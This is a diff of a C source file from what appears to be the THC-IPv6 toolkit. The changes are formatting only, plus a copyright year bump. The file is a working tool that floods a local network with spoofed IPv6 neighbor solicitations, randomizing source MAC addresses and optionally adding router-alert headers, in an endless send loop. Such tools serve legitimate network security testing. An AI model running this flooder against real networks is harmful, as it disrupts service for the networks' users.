@@ -11,27 +11,32 @@
 #include "thc-ipv6.h"
 
 void help(char *prg) {
-  printf("%s %s (c) 2019 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
-  printf("Syntax: %s [-k | -m mac] [-a] interface [target [query-address]]\n\n", prg);
+  printf("%s %s (c) 2020 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
+  printf("Syntax: %s [-k | -m mac] [-a] interface [target [query-address]]\n\n",
+         prg);
   printf("Flood the network with neighbor solicitations.\n");
   printf("if not supplied, target is random and query address is ff02::1\n");
-  printf("Use -a to add a hopbyhop header with router alert, -k to send with your real\nmac, -m to specify a mac or its randomized otherwise.\n");
-//  printf("Use -r to use raw mode.\n\n");
+  printf(
+      "Use -a to add a hopbyhop header with router alert, -k to send with your "
+      "real\nmac, -m to specify a mac or its randomized otherwise.\n");
+  //  printf("Use -r to use raw mode.\n\n");
   exit(-1);
 }
 
 int main(int argc, char *argv[]) {
-  char *interface, mac[8] = "", srcmac[8] = "";
+  char *         interface, mac[8] = "", srcmac[8] = "";
   unsigned char *mac6 = mac, *ip6, *query6, *smac = NULL;
-  unsigned char buf[24];
-  unsigned char *dst = thc_resolve6("ff02::1"), *dstmac = thc_get_multicast_mac(dst), *target = NULL;
-  int i, do_alert = 0, no_spoof = 0;
+  unsigned char  buf[24];
+  unsigned char *dst = thc_resolve6("ff02::1"),
+                *dstmac = thc_get_multicast_mac(dst), *target = NULL;
+  int            i, do_alert = 0, no_spoof = 0;
   unsigned char *pkt = NULL, buf2[6];
-  int pkt_len = 0, rawmode = 0, count = 0;
+  int            pkt_len = 0, rawmode = 0, count = 0;
 
   if (argc > 1 && strncmp(argv[1], "-a", 2) == 0) {
     do_alert = 1;
-    argc--; argv++;
+    argc--;
+    argv++;
   }
   if (argc > 2 && strncmp(argv[1], "-k", 2) == 0) {
     if ((smac = thc_get_own_mac(argv[2])) == NULL) {
@@ -42,23 +47,25 @@ int main(int argc, char *argv[]) {
     argc--;
   }
   if (argc > 2 && strncmp(argv[1], "-m", 2) == 0) {
-    sscanf(argv[2], "%x:%x:%x:%x:%x:%x", (unsigned int *) &srcmac[0], (unsigned int *) &srcmac[1], (unsigned int *) &srcmac[2], (unsigned int *) &srcmac[3],
-           (unsigned int *) &srcmac[4], (unsigned int *) &srcmac[5]);
+    sscanf(argv[2], "%x:%x:%x:%x:%x:%x", (unsigned int *)&srcmac[0],
+           (unsigned int *)&srcmac[1], (unsigned int *)&srcmac[2],
+           (unsigned int *)&srcmac[3], (unsigned int *)&srcmac[4],
+           (unsigned int *)&srcmac[5]);
     smac = srcmac;
-    argv+=2;
-    argc-=2;
+    argv += 2;
+    argc -= 2;
   }
   if (argc > 1 && strncmp(argv[1], "-a", 2) == 0) {
     do_alert = 1;
-    argc--; argv++;
+    argc--;
+    argv++;
   }
-  if (smac != NULL)
-    mac6 = smac;
+  if (smac != NULL) mac6 = smac;
 
-  if (argc < 2 || argc > 4 || strncmp(argv[1], "-h", 2) == 0)
-    help(argv[0]);
+  if (argc < 2 || argc > 4 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]);
 
-  if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]);
+  if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL)
+    printf("WARNING: %s is not working with injection!\n", argv[0]);
 
   srand(time(NULL) + getpid());
   setvbuf(stdout, NULL, _IONBF, 0);
@@ -83,11 +90,9 @@ int main(int argc, char *argv[]) {
     } else {
       dstmac = thc_get_mac(interface, NULL, query6);
     }
-    if (query6[0] < 0xfe && query6[0] >= 0x20)
-      no_spoof = 1;
+    if (query6[0] < 0xfe && query6[0] >= 0x20) no_spoof = 1;
   }
 
-
   if (no_spoof) {
     ip6 = thc_get_own_ipv6(interface, query6, PREFER_GLOBAL);
     memset(ip6 + 8, 0, 8);
@@ -109,21 +114,21 @@ int main(int argc, char *argv[]) {
   buf[17] = 1;
   buf[18] = mac[0];
   buf[19] = mac[1];
-  if (target != NULL)
-    memcpy(buf, target, 16);
-  
+  if (target != NULL) memcpy(buf, target, 16);
+
   if (do_alert) {
     memset(buf2, 0, sizeof(buf2));
     buf2[0] = 5;
     buf2[1] = 2;
   }
 
-  printf("Starting to flood network with neighbor solicitations on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface);
+  printf(
+      "Starting to flood network with neighbor solicitations on %s (Press "
+      "Control-C to end, a dot is printed for every 1000 packets):\n",
+      interface);
   while (1) {
-
     // use previous src as target if we did not specify a target
-    if (target == NULL)
-      memcpy(buf, ip6, 16);
+    if (target == NULL) memcpy(buf, ip6, 16);
 
     for (i = 2; i < 6; i++)
       mac[i] = rand() % 256;
@@ -137,24 +142,24 @@ int main(int argc, char *argv[]) {
     memcpy(&buf[20], mac + 2, 4);
     count++;
 
-    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, query6, 255, 0, 0, 0, 0)) == NULL)
+    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6,
+                                        query6, 255, 0, 0, 0, 0)) == NULL)
       return -1;
     if (do_alert)
       if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, sizeof(buf2)) < 0)
         return -1;
-    if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORSOL, 0, 0, buf, sizeof(buf), 0) < 0)
+    if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORSOL, 0, 0, buf, sizeof(buf),
+                      0) < 0)
       return -1;
     if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) {
-//      fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface);
-//      perror("");
-//      return -1;
+      //      fprintf(stderr, "Error sending packet no. %d on interface %s: ",
+      //      count, interface); perror(""); return -1;
       printf("!");
     }
 
     pkt = thc_destroy_packet(pkt);
-//    usleep(1);
-    if (count % 1000 == 0)
-      printf(".");
+    //    usleep(1);
+    if (count % 1000 == 0) printf(".");
   }
   return 0;
 }
